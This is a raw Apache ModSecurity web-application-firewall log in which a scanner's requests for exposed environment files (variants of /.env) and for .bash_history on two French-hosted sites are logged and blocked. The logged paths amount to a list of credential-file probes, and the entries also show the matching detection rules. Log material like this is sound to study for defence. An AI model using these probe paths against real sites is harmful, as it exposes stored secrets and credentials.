[Mon May 11 11:51:41.723649 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:44036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmrJkIEwRJMyDaV55OTwAAAVI"]
[Mon May 11 11:51:44.933761 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:13608] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.config/.env.dev.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.config/.env.dev.rc1"] [unique_id "agGmsERdw2n9wv6Ai48IGgAAAJA"]
[Mon May 11 11:51:44.934412 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:13608] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.config/.env.dev.rc1"] [unique_id "agGmsERdw2n9wv6Ai48IGgAAAJA"]
[Mon May 11 11:51:47.859054 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:13608] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmsERdw2n9wv6Ai48IGgAAAJA"]
[Mon May 11 11:51:47.885890 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:13612] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.config/.env.dev.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.config/.env.dev.rc1"] [unique_id "agGmsxjZymfuKpjWXeh8uAAAAM4"]
[Mon May 11 11:51:47.886631 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:13612] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.config/.env.dev.rc1"] [unique_id "agGmsxjZymfuKpjWXeh8uAAAAM4"]
[Mon May 11 11:51:47.899295 2026] [:error] [pid 1254212:tid 1254236] [client 192.241.148.170:48274] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:51:49.976294 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:13612] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmsxjZymfuKpjWXeh8uAAAAM4"]
[Mon May 11 11:52:08.892867 2026] [security2:error] [pid 1254212:tid 1254216] [client 216.73.216.110:45120] ModSecurity: Warning. Matched phrase ".bash_history" at ARGS:edit. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_history found within ARGS:edit: .bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agGmyEYQeUtAPynIs6xYLAAAAAI"]
[Mon May 11 11:52:08.894071 2026] [security2:error] [pid 1254212:tid 1254216] [client 216.73.216.110:45120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agGmyEYQeUtAPynIs6xYLAAAAAI"]
[Mon May 11 11:52:08.991772 2026] [security2:error] [pid 1254212:tid 1254216] [client 216.73.216.110:45120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmyEYQeUtAPynIs6xYLAAAAAI"]
[Mon May 11 11:52:09.124316 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:54142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.backup-old"] [unique_id "agGmyZkIEwRJMyDaV55OZAAAAUI"]
[Mon May 11 11:52:09.124539 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:54142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.backup-old"] [unique_id "agGmyZkIEwRJMyDaV55OZAAAAUI"]
[Mon May 11 11:52:10.716841 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:54142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmyZkIEwRJMyDaV55OZAAAAUI"]
[Mon May 11 11:52:10.748470 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:54152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.backup-old"] [unique_id "agGmyhjZymfuKpjWXeh8wwAAAMc"]
[Mon May 11 11:52:10.748995 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:54152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.backup-old"] [unique_id "agGmyhjZymfuKpjWXeh8wwAAAMc"]
[Mon May 11 11:52:12.623095 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:54152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmyhjZymfuKpjWXeh8wwAAAMc"]
[Mon May 11 11:52:12.651624 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:54158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.backup.inactive"] [unique_id "agGmzL4KNmD_mZ_vlf84lQAAAFQ"]
[Mon May 11 11:52:12.651834 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:54158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.backup.inactive"] [unique_id "agGmzL4KNmD_mZ_vlf84lQAAAFQ"]
[Mon May 11 11:52:14.094085 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:54158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmzL4KNmD_mZ_vlf84lQAAAFQ"]
[Mon May 11 11:52:14.119555 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:49578] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.backup.inactive"] [unique_id "agGmzmS6k_SCYd1AVZqtywAAAQE"]
[Mon May 11 11:52:14.120150 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:49578] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.backup.inactive"] [unique_id "agGmzmS6k_SCYd1AVZqtywAAAQE"]
[Mon May 11 11:52:15.836355 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:49578] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmzmS6k_SCYd1AVZqtywAAAQE"]
[Mon May 11 11:52:15.864611 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:49586] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.bak.draft"] [unique_id "agGmz0YQeUtAPynIs6xYLwAAABA"]
[Mon May 11 11:52:15.864830 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:49586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.bak.draft"] [unique_id "agGmz0YQeUtAPynIs6xYLwAAABA"]
[Mon May 11 11:52:17.602834 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:49586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGmz0YQeUtAPynIs6xYLwAAABA"]
[Mon May 11 11:52:17.633944 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:49594] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.bak.draft"] [unique_id "agGm0RjZymfuKpjWXeh8zAAAAMw"]
[Mon May 11 11:52:17.635212 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:49594] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.bak.draft"] [unique_id "agGm0RjZymfuKpjWXeh8zAAAAMw"]
[Mon May 11 11:52:19.712569 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:49594] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm0RjZymfuKpjWXeh8zAAAAMw"]
[Mon May 11 11:52:19.745097 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:49608] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.bak.rc1"] [unique_id "agGm00Rdw2n9wv6Ai48IOwAAAII"]
[Mon May 11 11:52:19.745627 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:49608] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.bak.rc1"] [unique_id "agGm00Rdw2n9wv6Ai48IOwAAAII"]
[Mon May 11 11:52:21.051401 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:49608] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm00Rdw2n9wv6Ai48IOwAAAII"]
[Mon May 11 11:52:21.082572 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:49616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.bak.rc1"] [unique_id "agGm1ZkIEwRJMyDaV55OcQAAAU0"]
[Mon May 11 11:52:21.083112 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:49616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.bak.rc1"] [unique_id "agGm1ZkIEwRJMyDaV55OcQAAAU0"]
[Mon May 11 11:52:22.304711 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:49616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm1ZkIEwRJMyDaV55OcQAAAU0"]
[Mon May 11 11:52:22.336408 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:49624] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.bak.template"] [unique_id "agGm1kRdw2n9wv6Ai48IPAAAAIg"]
[Mon May 11 11:52:22.337908 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:49624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.bak.template"] [unique_id "agGm1kRdw2n9wv6Ai48IPAAAAIg"]
[Mon May 11 11:52:23.526385 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:49624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm1kRdw2n9wv6Ai48IPAAAAIg"]
[Mon May 11 11:52:23.559885 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:38516] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.bak.template"] [unique_id "agGm12S6k_SCYd1AVZqt1wAAAQI"]
[Mon May 11 11:52:23.560232 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:38516] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.bak.template"] [unique_id "agGm12S6k_SCYd1AVZqt1wAAAQI"]
